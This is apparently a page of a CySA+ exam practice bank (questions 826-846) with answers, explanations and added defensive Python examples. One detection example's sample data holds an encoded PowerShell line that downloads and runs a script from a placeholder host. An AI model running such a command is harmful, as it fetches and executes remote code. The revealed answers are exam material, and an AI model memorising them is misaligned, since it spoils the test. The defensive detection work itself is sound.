CompTIA CySA+ CS0-003 (CS0-003) — Questions 826–900

989 questions total · 14 pages · All types, answers revealed

Page 12 of 14

826
MCQ · hard

File shares show rapid encryption and ransom-note creation from one workstation. What is the BEST immediate containment action?

A. Run vulnerability scans on every subnet first
B. Restore backups before isolating the host
C. Email all users the ransom note
D. Isolate the workstation and disable its active sessions to file servers
Answer: D

Containment must stop the encryption from spreading while preserving the evidence the investigation will need; the defensible choice is the action that reduces risk without destroying the investigation record.

Why this answer

Option D is correct because the immediate priority is to stop the ransomware from encrypting more data and moving laterally. Isolating the workstation (an EDR network-isolate action, or physically disconnecting it) and terminating its active SMB sessions to the file servers cuts off the encryption at its source. Prefer network isolation over powering the host off: a hard shutdown destroys the process list, network connections and other in-memory artifacts the investigation depends on, whereas isolation stops the damage and leaves that volatile evidence in place for a memory capture.

Exam trap

The CS0-003 exam often tests the principle that containment must be immediate and technical (e.g., isolating the host) rather than investigative (scanning) or restorative (backups), and the trap here is that candidates may think scanning or restoring is a valid first step, when in fact it wastes critical time during active encryption.

How to eliminate wrong answers

Option A is wrong because running vulnerability scans is a time-consuming, passive step that does nothing to halt active encryption or lateral movement; containment must come first. Option B is wrong because restoring backups before isolating the host risks re-infection if the ransomware is still active on the network, and it violates the containment-first principle of incident response. Option C is wrong because emailing the ransom note to all users is not a containment action; it may cause panic, spread misinformation, and does not stop the encryption or disable the attacker's access.

827
Multi-Select · medium

During the post-incident analysis phase of an incident response process, which of the following activities are considered essential best practices? Choose all that apply. (There are four correct answers.)

Select 4 answers
A. Creating a detailed timeline of the incident from detection to containment and recovery.
B. Identifying gaps in existing security controls that allowed the incident to occur.
C. Updating playbooks and incident response plans based on lessons learned.
D. Performing a root cause analysis to determine the underlying cause of the incident.
E. Immediately deleting all logs related to the incident to free up storage space.
F. Notifying law enforcement and regulatory bodies before conducting any internal investigation.
Answers: A, B, C, D

Why this answer

A detailed timeline is essential for reconstructing the sequence of events, identifying the initial compromise vector, and measuring response effectiveness. It provides the factual basis for the other three activities: root cause analysis explains why the timeline unfolded as it did, gap identification turns that explanation into specific control failures, and playbook updates carry the lessons forward to the next incident. Deleting logs destroys the evidence all of that analysis depends on (and may violate retention obligations), and the order of external notification is set by policy, contract and law rather than being a precondition for any internal investigation.

Exam trap

CompTIA often tests the distinction between 'immediate containment actions' and 'post-incident analysis best practices,' where candidates mistakenly select actions that are appropriate during the containment phase (like preserving evidence) but not during the analysis phase, or they confuse notification requirements with internal investigation priorities.

828
Multi-Select · hard

An emergency patch may break a revenue-critical system. Which actions balance risk and availability? (Choose two.)

Select 2 answers
A. Test the patch in a representative staging environment
B. Apply temporary compensating controls while preparing deployment
C. Disable monitoring to avoid alerts during the change
D. Ignore active exploitation until the next annual review
Answers: A, B

Testing reduces outage risk.

Why this answer

Option A is correct because testing the emergency patch in a representative staging environment that mirrors the production system's configuration, dependencies, and load allows you to identify potential breaking changes before deployment. This balances risk by validating the patch's impact on revenue-critical systems while maintaining availability, as any failures are contained in the test environment. Option B is correct because applying temporary compensating controls—such as additional monitoring, rate limiting, or failover mechanisms—provides a safety net that reduces the blast radius of a potential patch failure, enabling you to proceed with deployment while preserving system availability.

Exam trap

The CS0-003 exam often tests the misconception that disabling monitoring reduces operational overhead during changes, but the trap here is that it actually increases risk by removing the ability to detect and respond to failures, which is essential for maintaining availability in revenue-critical systems.

829
MCQ · medium

An EDR alert shows powershell.exe launched by winword.exe with an encoded command line and outbound HTTPS shortly after a user opened an email attachment. What is the BEST first analytic pivot?

A. Disable the SIEM parser for PowerShell events
B. Reimage every workstation in the department
C. Close the alert because HTTPS is expected traffic
D. Decode the command and inspect the process tree, parent document, and network destination
Answer: D

Encoded PowerShell launched by Office is a high-signal chain; decoding and process-tree review confirms intent and scope.

Why this answer

Option D is correct because the encoded PowerShell command is the primary indicator of malicious intent; decoding it reveals the attacker's instructions. Inspecting the process tree (winword.exe spawning powershell.exe) confirms the infection vector (phishing attachment), and analyzing the parent document and network destination identifies the payload and C2 server. This sequence directly addresses root-cause analysis by tracing the attack from initial access to execution.

Exam trap

CompTIA often tests the misconception that encoded commands or HTTPS traffic are inherently benign, tempting candidates to dismiss the alert or take premature remediation steps instead of performing forensic analysis.

How to eliminate wrong answers

Option A is wrong because disabling the SIEM parser for PowerShell events would blind the security team to future attacks, not investigate the current alert. Option B is wrong because reimaging every workstation is a drastic remediation step that should only occur after confirming the scope of compromise through forensic analysis, not as a first analytic pivot. Option C is wrong because HTTPS is commonly used by malware to blend in with legitimate traffic; assuming it is benign ignores the context of an encoded PowerShell launch from a document reader.

830
Multi-Select · hard

A team requests a patch exception for a legacy application. What should be required? (Choose two.)

Select 2 answers
A. Documented compensating controls and monitoring
B. A time-bound owner-approved risk acceptance
C. Removal of the asset from inventory
D. Permanent suppression from all reports
Answers: A, B

Controls reduce risk while the vulnerability remains.

Why this answer

A is correct because when a patch cannot be applied to a legacy application, compensating controls (e.g., network segmentation, host-based firewall rules, or input validation) must be documented to mitigate the specific vulnerabilities the patch would address. Monitoring must also be implemented to detect any exploitation attempts against those unpatched weaknesses, ensuring the residual risk is continuously observed. This aligns with the vulnerability management lifecycle where exceptions require evidence of alternative risk reduction, not just a waiver.

Exam trap

The CS0-003 exam often tests whether candidates treat 'removal from inventory' as a quick fix for an unpatchable asset. The trap is that removing an asset from inventory is a separate decision (decommissioning) and, if the system keeps running, simply hides the risk from reporting; a patch exception keeps the asset tracked, with its compensating controls, an accountable owner and an expiry date on the acceptance.

831
MCQ · easy

A security analyst is reviewing logs from multiple sources to investigate a potential intrusion. Which log source would provide the most reliable evidence of successful authentication from an unusual location?

A. Endpoint detection and response (EDR) logs
B. Firewall logs
C. Authentication logs
D. DNS logs
Answer: C

Authentication logs directly record login attempts and outcomes.

Why this answer

Authentication logs record each login attempt with the account, source IP, timestamp and outcome (for example Windows Security event 4624 for a successful logon, or the sshd entries in Linux auth logs), making them the best source for identifying successful authentication from an unusual location. Firewall and DNS logs can show that a connection occurred, and EDR shows what ran afterwards, but none of them records whether the credential check actually succeeded.

832
Multi-Select · medium

A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)

Select 2 answers
A. Frequent DNS queries
B. HTTP POST requests
C. Large outbound data transfers during off-hours
D. Use of SCP on port 22
E. ICMP echo requests
Answers: C, D

Off-hours transfers are suspicious.

Why this answer

Port 22 (SSH) with SCP is an encrypted channel an attacker can use to move data out without content inspection, and large transfers outside business hours do not match normal user activity; both C and D are directly supported by the observed traffic.

A (frequent DNS queries, the signature of DNS tunnelling) is not indicated, E (ICMP echo requests, used for ICMP tunnelling) is not shown, and B (HTTP POST requests) is not mentioned in the scenario.

833
MCQ · medium

During forensic acquisition, which of the following types of data is considered the MOST volatile?

A. Network connections
B. Disk
C. Page file
D. RAM
Answer: D

RAM is volatile and changes constantly; it is the most volatile.

Why this answer

RAM (Random Access Memory) is the most volatile data because it loses its contents immediately when power is removed. In forensic acquisition, the order of volatility dictates that RAM must be captured first, as it contains running processes, open network connections, and decrypted data that cannot be recovered from disk. Network connections, while volatile, are a subset of the data stored in RAM and are less critical to capture first.

Exam trap

CompTIA often tests the order of volatility by making candidates confuse 'network connections' as the most volatile because they change rapidly, but the key is that network connection data is stored in RAM, making RAM itself the most volatile component that must be acquired first.

How to eliminate wrong answers

Option A is wrong because network connections are a type of data that resides in RAM and are therefore less volatile than RAM itself; they are captured as part of the RAM dump. Option B is wrong because disk data is non-volatile and persists after power loss, making it the least volatile among the options. Option C is wrong because the page file (swap file) is stored on disk and is non-volatile; it is a secondary storage mechanism, not primary memory.

834
MCQ · easy

During an incident response, the team identifies that a workstation was compromised via a phishing email. Which of the following should be performed immediately after containment?

A. Notify law enforcement about the phishing campaign.
B. Collect forensic evidence from the workstation.
C. Conduct a root cause analysis of the phishing email.
D. Eradicate the malware from the workstation.
Answer: D

Eradication follows containment to remove the threat.

Why this answer

Option D is correct because, immediately after containment, the priority is to eradicate the malware from the workstation to prevent reinfection or lateral movement. Containment isolates the system, but eradication removes the malicious artifacts (e.g., registry keys, scheduled tasks, or malicious binaries) to ensure the system is clean before recovery. This step aligns with the NIST SP 800-61 incident response lifecycle, where eradication follows containment to eliminate the threat's foothold.

Exam trap

CompTIA often tests the order of the incident response phases (containment, eradication, recovery, lessons learned) and the trap here is that candidates mistakenly choose 'Collect forensic evidence' (Option B) because they confuse the need for evidence with the immediate priority of removing the active threat after containment.

How to eliminate wrong answers

Option A is wrong because notifying law enforcement is not the next technical step; whether and when to notify is a decision for management and legal counsel under the organization's policy, and it does nothing to remove the malware. Option B is wrong because evidence collection belongs to the detection/analysis and containment activities: the memory and disk images are taken as the host is isolated, before eradication wipes the artifacts, so by the time containment is complete that evidence should already be preserved rather than still waiting to be collected. Option C is wrong because root cause analysis is part of the post-incident (lessons learned) phase; it is done after the threat is removed and service restored, not while the malware is still present on the host.

835
Multi-Select · medium

A security analyst is performing forensic analysis of a compromised system. The analyst needs to acquire disk evidence in a forensically sound manner. Which TWO actions should the analyst take to ensure the integrity of the evidence? (Choose TWO.)

Select 2 answers
A. Calculate a hash of the original drive before imaging
B. Disable the write blocker to speed up the imaging process
C. Use a write blocker when connecting the source drive
D. Power on the system and run a full antivirus scan before imaging
E. Reboot the system to clear any temporary files
Answers: A, C

Hashing the original drive allows later verification that the image matches.

Why this answer

Using a write blocker prevents alteration of the original disk, and computing a hash verifies that the acquired image is an exact copy.
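
The acquisition and verification the question describes, as an added example in Python (not part of the question bank or of any forensic tool it names). It copies a source device bit for bit, hashes the source and the image in the same pass, re-reads the stored image, and records everything in a chain-of-custody log. The sample 'device' is a constructed 4 KiB file and the file names are illustrative; the write blocker is assumed to be present in hardware, which is why the source is only ever opened read-only here.

```python
import hashlib
import os
import tempfile
from datetime import datetime, timezone

BLOCK_SIZE = 512 * 1024  # sector-aligned chunks; never load the whole device into memory


def sha256_file(path: str) -> str:
    """Stream a file (or block device) through SHA-256 without reading it all at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(BLOCK_SIZE), b""):
            h.update(chunk)
    return h.hexdigest()


def acquire_image(source: str, image: str, custody_log: str) -> dict:
    """Bit-for-bit copy of `source` into `image`, hashing both streams.

    The source is opened read-only; on a real acquisition the hardware write
    blocker is what guarantees nothing can write to it regardless of software.
    Returns both digests plus a verified flag and appends them to the
    chain-of-custody log so the image can be rechecked later.
    """
    src_hash = hashlib.sha256()
    img_hash = hashlib.sha256()
    with open(source, "rb") as src, open(image, "wb") as dst:
        for chunk in iter(lambda: src.read(BLOCK_SIZE), b""):
            src_hash.update(chunk)
            dst.write(chunk)
            img_hash.update(chunk)  # hash of exactly what was written
        dst.flush()
        os.fsync(dst.fileno())
    # Re-read the image from disk so the recorded digest reflects the stored bytes.
    stored = sha256_file(image)
    record = {
        "acquired_at": datetime.now(timezone.utc).isoformat(),
        "source": source,
        "source_sha256": src_hash.hexdigest(),
        "image": image,
        "image_sha256": stored,
        "verified": src_hash.hexdigest() == img_hash.hexdigest() == stored,
    }
    with open(custody_log, "a", encoding="utf-8") as log:
        log.write("{acquired_at} source={source} sha256={source_sha256}\n"
                  "{acquired_at} image={image} sha256={image_sha256} verified={verified}\n"
                  .format(**record))
    return record


def verify_image(image: str, expected_sha256: str) -> bool:
    """Recheck an image against the digest recorded at acquisition time."""
    return sha256_file(image) == expected_sha256


if __name__ == "__main__":
    # Constructed sample: 4 KiB of random bytes stands in for a write-blocked /dev/sdb.
    workdir = tempfile.mkdtemp()
    device = os.path.join(workdir, "sdb.sample")
    with open(device, "wb") as f:
        f.write(os.urandom(4096))
    rec = acquire_image(device, os.path.join(workdir, "sdb.dd"),
                        os.path.join(workdir, "custody.log"))
    print("verified:", rec["verified"], rec["image_sha256"])
```

On a real acquisition the source is the write-blocked device node and the image and log go to a separate evidence drive; verify_image is what you run before analysis, and again whenever the image has to be produced as evidence.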

836
Multi-Select · medium

A vulnerability manager wants accurate Linux package findings. Which scan conditions are important? (Choose two.)

Select 2 answers
A. Authenticated access to inspect installed packages
B. Scanner account permissions sufficient for inventory commands
C. Only scanning ICMP echo replies
D. Changing server hostnames randomly
Answers: A, B

Local package state usually requires credentials.

Why this answer

For accurate Linux package findings, the vulnerability scanner must have authenticated access (e.g., via SSH with valid credentials) to inspect installed packages directly from the package manager database (e.g., RPM or dpkg). Without authentication, the scanner can only perform unauthenticated network-based checks, which cannot reliably determine installed software versions or patch levels. Authenticated access ensures the scanner can execute commands like 'rpm -qa' or 'dpkg -l' to enumerate packages with high accuracy.

Exam trap

The CS0-003 exam often tests the misconception that unauthenticated network scans (e.g., banner grabbing or ICMP) can replace authenticated scans for accurate software inventory, but only authenticated access with proper permissions yields reliable package-level findings.
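
Why the authenticated inventory matters, as an added Python example (not code from the page or from any scanner): it parses constructed output of rpm -qa --qf '%{NAME} %{EPOCH}:%{VERSION}-%{RELEASE}\n', compares each installed EVR against an advisory's fixed EVR using rpm's own ordering rules (rpmvercmp, minus the newer tilde and caret rules, which is a simplification of this example), and reports vulnerable, patched or not installed. The advisory IDs, package versions and fixed versions are constructed for illustration and are not real advisories. This is the comparison a banner-based network scan cannot make: a backported fix leaves the upstream version string unchanged and only the release field moves.

```python
import re

SEGMENT_RE = re.compile(r"\d+|[A-Za-z]+")


def rpmvercmp(a: str, b: str) -> int:
    """Compare two rpm version (or release) strings like librpm's rpmvercmp.

    Returns 1 if a is newer, -1 if older, 0 if equal. Assumption of this
    example: the '~' and '^' ordering rules of newer rpm releases are omitted.
    """
    if a == b:
        return 0
    seg_a, seg_b = SEGMENT_RE.findall(a), SEGMENT_RE.findall(b)
    for x, y in zip(seg_a, seg_b):
        if x.isdigit() and y.isdigit():
            x, y = x.lstrip("0"), y.lstrip("0")          # 01 == 1
            if len(x) != len(y):                           # longer number is bigger
                return 1 if len(x) > len(y) else -1
            if x != y:
                return 1 if x > y else -1
        elif x.isdigit() != y.isdigit():                   # numeric beats alpha
            return 1 if x.isdigit() else -1
        elif x != y:
            return 1 if x > y else -1
    if len(seg_a) == len(seg_b):
        return 0
    return 1 if len(seg_a) > len(seg_b) else -1           # leftover segments win


def parse_evr(evr: str) -> tuple:
    """Split 'epoch:version-release' as printed by rpm --qf; '(none)' means epoch 0."""
    epoch, rest = evr.split(":", 1) if ":" in evr else ("0", evr)
    epoch = 0 if epoch == "(none)" else int(epoch)
    version, release = rest.rsplit("-", 1) if "-" in rest else (rest, "")
    return epoch, version, release


def compare_evr(a: str, b: str) -> int:
    """Full rpm ordering: epoch numerically, then version, then release."""
    ea, va, ra = parse_evr(a)
    eb, vb, rb = parse_evr(b)
    if ea != eb:
        return 1 if ea > eb else -1
    return rpmvercmp(va, vb) or rpmvercmp(ra, rb)


def parse_inventory(rpm_qa_output: str) -> dict:
    """Parse lines from: rpm -qa --qf '%{NAME} %{EPOCH}:%{VERSION}-%{RELEASE}\\n'"""
    inventory = {}
    for line in rpm_qa_output.splitlines():
        if line.strip():
            name, evr = line.split(None, 1)
            inventory[name] = evr.strip()
    return inventory


def evaluate(inventory: dict, advisories: list) -> list:
    """Match advisories (id, package, fixed EVR) against the authenticated inventory."""
    findings = []
    for advisory_id, package, fixed in advisories:
        installed = inventory.get(package)
        if installed is None:
            status = "not installed"
        elif compare_evr(installed, fixed) < 0:
            status = "vulnerable"
        else:
            status = "patched"
        findings.append({"advisory": advisory_id, "package": package,
                         "installed": installed, "fixed": fixed, "status": status})
    return findings


# Constructed sample output of the rpm -qa command above (illustrative versions).
SAMPLE_RPM_QA = """\
openssl 1:1.1.1k-7.el8
kernel (none):4.18.0-477.10.1.el8
glibc (none):2.28-225.el8
"""
# Constructed advisory data; the IDs and fixed versions are illustrative, not real advisories.
SAMPLE_ADVISORIES = [
    ("EXAMPLE-0001", "openssl", "1:1.1.1k-9.el8"),
    ("EXAMPLE-0002", "kernel", "0:4.18.0-477.10.1.el8"),
    ("EXAMPLE-0003", "glibc", "0:2.28-236.el8"),
    ("EXAMPLE-0004", "sudo", "0:1.9.5p2-1.el8"),
]

if __name__ == "__main__":
    for f in evaluate(parse_inventory(SAMPLE_RPM_QA), SAMPLE_ADVISORIES):
        print(f"{f['advisory']:13} {f['package']:8} installed={f['installed']} "
              f"fixed={f['fixed']} -> {f['status']}")
```

The openssl and glibc lines are the instructive ones: the upstream versions match the fixed versions exactly, and only the release field shows that the build is older. Without the credentialed rpm -qa output there is nothing to compare.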

837
MCQ · medium

Based on the exhibit, which type of issue is most likely affecting the server's network performance?

A. Faulty network cable or interface
B. Duplex mismatch between the server and switch
C. Incorrect TCP/IP configuration
D. Outdated network driver
Answer: A

High CRC and frame errors suggest physical layer problems.

Why this answer

The exhibit shows excessive CRC errors and runts on the server's network interface, which are classic symptoms of a faulty physical layer component such as a damaged cable or failing NIC. These errors indicate that frames are being corrupted during transmission, and the interface is discarding them, leading to retransmissions and degraded performance. A faulty cable or interface directly causes these physical-layer issues, unlike configuration or driver problems.

Exam trap

CompTIA often tests the distinction between physical-layer damage (CRC errors and runts climbing with no collision counters) and a duplex mismatch, whose identifying symptom is late collisions on the half-duplex side; candidates pick duplex mismatch because it is the better-known fault, even though the exhibit shows CRC errors and runts without the late collisions a mismatch would produce.

How to eliminate wrong answers

Option B is wrong because, while a duplex mismatch does produce CRC errors and runts on the full-duplex side (FCS errors are CRC errors; the frame check sequence is a CRC), what identifies a mismatch is late collisions and excessive collisions on the half-duplex side, and the exhibit shows no collision counters. Option C is wrong because incorrect TCP/IP configuration (wrong subnet mask, gateway or DNS) causes connectivity or routing failures, not frames arriving corrupted at the physical layer. Option D is wrong because an outdated network driver might cause performance problems or interface resets, but CRC errors and runts are counted by the hardware on the wire; a driver does not corrupt frames in transit.

838
Multi-Select · medium

An organization has just experienced a successful phishing attack that led to credential theft. The incident response team is performing analysis. Which three of the following indicators of compromise (IOCs) would be most relevant to investigate? (Choose three.)

Select 3 answers
A. Unusual outbound network connections from user workstations.
B. A spike in failed login attempts from a single IP address.
C. New scheduled tasks created on endpoints without user knowledge.
D. Emails with similar subject lines being sent from internal accounts.
E. A sudden increase in available disk space on file servers.
F. The antivirus definition file being updated automatically.
Answers: A, C, D

Why this answer

Unusual outbound network connections from user workstations are a key IOC because after credential theft, attackers often use stolen credentials to establish remote access or exfiltrate data, generating connections to command-and-control (C2) servers or unexpected external IPs. New scheduled tasks created on endpoints without user knowledge indicate persistence mechanisms, as attackers commonly use schtasks.exe or at.exe to maintain access and execute malicious code at regular intervals. Emails with similar subject lines being sent from internal accounts suggest lateral phishing or spam campaigns using compromised accounts to spread malware or harvest additional credentials, a classic post-exploitation behavior.

Exam trap

CompTIA often tests the distinction between indicators of a successful attack (post-compromise IOCs like lateral movement and persistence) versus indicators of an attempted attack (like brute-force failures), so candidates mistakenly choose failed login attempts instead of recognizing that credential theft leads to successful logins and internal propagation.

839
MCQ · easy

Which metric in the CVSS v3.1 base score indicates the level of access an attacker needs to exploit a vulnerability?

A. Privileges Required (PR)
B. Attack Vector (AV)
C. Attack Complexity (AC)
D. User Interaction (UI)
Answer: A

PR indicates the privileges required to exploit.

Why this answer

Privileges Required (PR) states the level of privileges an attacker must already hold before exploiting the vulnerability: None, Low (an ordinary user) or High (administrative). It is also the one base metric whose numeric weight depends on another metric: when Scope is Changed, Low and High are weighted 0.68 and 0.50 instead of 0.62 and 0.27, so the same PR value contributes more to the score. Attack Vector describes where the attacker must be, Attack Complexity describes conditions outside the attacker's control, and User Interaction describes whether a victim has to participate.

840
MCQ · easy

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant, and gives the analyst the clearest next triage step?

A. Successful DHCP renewal
B. A password expiry warning
C. High CPU usage on the print server
D. Office document spawning a script interpreter from a user context
Answer: D

Office-to-script process chains are common initial execution patterns for phishing payloads.

Why this answer

Option D is correct because the scenario describes a classic technique where a malicious macro or script embedded in an Office document executes wscript.exe (Windows Script Host) from the user's profile. This detection logic directly identifies the suspicious parent-child process relationship of an Office application spawning a script interpreter, which is a strong indicator of a script-based attack, such as a macro virus or initial access payload.

Exam trap

CompTIA often tests the concept of process lineage and anomalous parent-child relationships, where candidates may mistakenly focus on system-level performance or network events instead of recognizing that the key indicator is the Office document spawning a script interpreter from the user's profile.

How to eliminate wrong answers

Option A is wrong because a successful DHCP renewal is a routine network operation that does not involve process execution anomalies or user-initiated scripts, making it irrelevant to detecting a malicious script spawned from an Office document. Option B is wrong because a password expiry warning is an authentication event unrelated to process creation or script execution, and it does not indicate any compromise or suspicious activity on the endpoint. Option C is wrong because high CPU usage on the print server is a performance metric for a different system component and has no direct correlation with a user endpoint running wscript.exe from a script interpreter invoked by an Office document.
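
Added example, in Python, for the two Office-to-interpreter alerts above (question 829's encoded PowerShell launched by winword.exe, and question 840's wscript.exe launched after an invoice document); it is not code from the question bank or from any EDR product. It runs a parent/child detection over constructed Sysmon Event ID 1 style records, pulls the parent's open document out of its command line, and decodes a -EncodedCommand payload (base64 over UTF-16LE). The interpreter list, host and user names, file paths and the example.invalid URL in the sample payload are all assumptions made for the example.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the ones seen in practice.
ENCODED_FLAG_RE = re.compile(r"(?i)(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_FLAG_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_office_spawns(events: list) -> list:
    """Flag process-creation events where an Office application spawns a script interpreter.

    `events` are Sysmon Event ID 1 style records reduced to dicts. Each finding carries
    the lineage, the decoded PowerShell payload if any, and the document the parent had
    open (taken from the parent's command line) so the analyst can pivot immediately.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        if _basename(parent["image"]) in OFFICE_PARENTS and _basename(e["image"]) in SCRIPT_INTERPRETERS:
            doc = re.search(r'"([^"]+\.(?:docm?|xlsm?|pptm?|rtf))"', parent["cmdline"], re.I)
            findings.append({
                "host": e["host"],
                "user": e["user"],
                "chain": f"{_basename(parent['image'])} -> {_basename(e['image'])}",
                "document": doc.group(1) if doc else None,
                "decoded": decode_encoded_command(e["cmdline"]),
                "cmdline": e["cmdline"],
            })
    return findings


def build_sample_events() -> list:
    """Constructed sample telemetry (not real events); the payload is a harmless placeholder."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"
    return [
        {"host": "WS01", "user": "corp\\alice", "pid": 4120, "ppid": 900,
         "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" "C:\Users\alice\Downloads\Invoice_4471.docm"'},
        {"host": "WS01", "user": "corp\\alice", "pid": 5004, "ppid": 4120,
         "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "cmdline": f"powershell.exe -nop -w hidden -enc {encode_command(payload)}"},
        {"host": "WS01", "user": "corp\\alice", "pid": 5100, "ppid": 4120,
         "image": r"C:\Windows\System32\wscript.exe",
         "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\inv.js"'},
        # Benign control: PowerShell whose parent is not an Office application.
        {"host": "WS01", "user": "corp\\alice", "pid": 6000, "ppid": 1200,
         "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    ]


if __name__ == "__main__":
    for f in detect_office_spawns(build_sample_events()):
        print(f"{f['host']} {f['user']} {f['chain']} doc={f['document']} decoded={f['decoded']!r}")
```

Two details a naive rule gets wrong: the flag is matched by prefix because PowerShell accepts -e, -ec and -enc as well as the full name, and the payload is UTF-16LE rather than ASCII, so decoding it with the wrong codec yields the script interleaved with NUL bytes instead of something readable.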

841
MCQ · medium

A security analyst discovers a server that is missing multiple critical patches. The server hosts a legacy application that cannot be patched immediately due to compatibility issues. Which of the following is the BEST approach to manage the vulnerability risk?

A. Apply a virtual patch using a WAF
B. Implement network segmentation and increase monitoring
C. Disable the server until a patch is available
D. Remove the server from the network
Answer: B

This reduces risk by isolating the server and enabling detection of attacks.

Why this answer

Option B is the best approach because network segmentation isolates the vulnerable legacy server from critical assets, reducing the attack surface, while increased monitoring allows the security team to detect and respond to any exploitation attempts in real time. This balances risk acceptance with active defense, which is a core principle of vulnerability management when patching is not immediately feasible.

Exam trap

The trap here is that candidates often choose 'Apply a virtual patch using a WAF' because they overestimate the scope of WAF protection, forgetting that it only covers web-based attacks and not OS-level or protocol-level vulnerabilities.

How to eliminate wrong answers

Option A is wrong because a WAF (Web Application Firewall) applies virtual patches only at the application layer (HTTP/HTTPS), and cannot protect against vulnerabilities in other services (e.g., SMB, RDP, or OS-level exploits) that the legacy server may expose. Option C is wrong because disabling the server entirely disrupts business operations and is an overly drastic measure that does not align with risk management best practices unless the vulnerability is critical and actively exploited. Option D is wrong because removing the server from the network completely halts its function and is equivalent to decommissioning, which is not a temporary risk management strategy and ignores the need to maintain business continuity.

842
Drag & Drop · medium

Arrange the steps for conducting a risk assessment in the correct order.


Why this order

Risk assessment proceeds in this order:

1. Identify the assets in scope.
2. Identify the threats and vulnerabilities that apply to them.
3. Analyze the likelihood and impact of each threat exploiting each vulnerability.
4. Calculate the risk (likelihood combined with impact).
5. Prioritize the risks for treatment.

843
MCQ · medium

A security analyst notices that an IDS is generating a high number of false positives for legitimate encrypted traffic. Which tuning method should the analyst use to reduce false positives without reducing detection capability?

A. Whitelist the source IP addresses of known, trusted servers.
B. Disable the signatures that trigger for encrypted traffic.
C. Increase the sensitivity threshold for the encrypted traffic signatures.
D. Enable full packet capture and analyze the encrypted traffic manually.
Answer: A

Whitelisting reduces false positives by exempting known benign traffic.

Why this answer

Whitelisting the source IP addresses of known, trusted servers reduces false positives by instructing the IDS to ignore alerts for encrypted traffic from those specific hosts. This preserves detection capability because the IDS continues to apply every signature to traffic from all other, potentially malicious, sources. It is a targeted tuning method that neither disables detection mechanisms nor alters sensitivity thresholds, either of which could cause real threats to be missed. One practitioner caveat: an exemption keyed only on source IP becomes a blind spot if that trusted server is itself compromised, so scope it as narrowly as the sensor allows (a suppression tied to the specific signature and source, not a global ignore of the host) and review the list periodically.

Exam trap

CompTIA often tests the misconception that disabling signatures or increasing thresholds is an acceptable tuning method, but the trap here is that those actions reduce detection capability, whereas whitelisting trusted sources is the only option that maintains full detection for untrusted traffic.

How to eliminate wrong answers

Option B is wrong because disabling the signatures that fire on encrypted traffic eliminates detection of anything hidden in that stream, such as command-and-control traffic or data exfiltration, which is a direct loss of detection capability. Option C is wrong because raising the threshold suppresses alerts across the board, trading false positives for false negatives: real attacks that now fall below the threshold are missed, and the underlying mis-firing on legitimate traffic is not addressed. Option D is wrong because enabling full packet capture and manually analyzing encrypted traffic is not a tuning method; it is a resource-intensive forensic approach that neither reduces false positives in real time nor scales for ongoing operations.

844
MCQ · medium

A security analyst is preparing a vulnerability report for the IT operations team. Which section should provide a high-level overview of the organization's risk posture?

A. Risk acceptance
B. Executive summary
C. Remediation timeline
D. Findings by severity
Answer: B

The executive summary gives a high-level risk overview.

Why this answer

The executive summary provides a concise overview of key findings and risk posture for management.

845
MCQ · easy

An organization wants to automate the sharing of threat intelligence with other trusted entities using a standardized protocol. Which protocol is specifically designed for this purpose?

A. STIX
B. TAXII
C. REST API
D. MISP
Answer: B

TAXII is the transport protocol for sharing threat intelligence.

Why this answer

TAXII (Trusted Automated eXchange of Intelligence Information, originally Indicator Information) is the transport protocol for exchanging cyber threat intelligence between trusted parties. STIX is the content format it usually carries, not the transport; MISP is a sharing platform rather than a protocol; and REST is the generic API style that TAXII 2.x itself is built on, not a threat-intelligence protocol in its own right.

846
MCQ · hard

A credentialed Linux scan fails on several hosts after SSH hardening. What is the BEST next step before any finding on those hosts is closed or downgraded?

A. Run only unauthenticated scans forever
B. Disable SSH on all servers
C. Assume the hosts have no vulnerabilities
D. Review scanner account permissions, allowed authentication methods, and sudo command restrictions
Answer: D

Credentialed scans depend on authentication and sufficient read access to inspect packages and configuration.

Why this answer

Option D is correct because SSH hardening commonly changes exactly the settings a credentialed scan depends on: PasswordAuthentication no breaks a scanner still configured with a password, AllowUsers or AllowGroups can exclude the scanner account, a reduced Ciphers or KexAlgorithms list can reject the scanner's SSH client, and a tightened sudoers file can strip the NOPASSWD entries the scanner needs for its privileged inventory commands. Checking those against the scanner's configuration (an ssh -v login as the scanner account reproduces the failure quickly) restores coverage without weakening the hardening. Until it is fixed, the hosts' existing findings stay open: a failed scan is missing data, not evidence of remediation.

Exam trap

The CS0-003 exam often tests the misconception that a scan failure after hardening means the hosts are secure, when in reality the failure is a connectivity or authentication issue that must be resolved to maintain visibility.

How to eliminate wrong answers

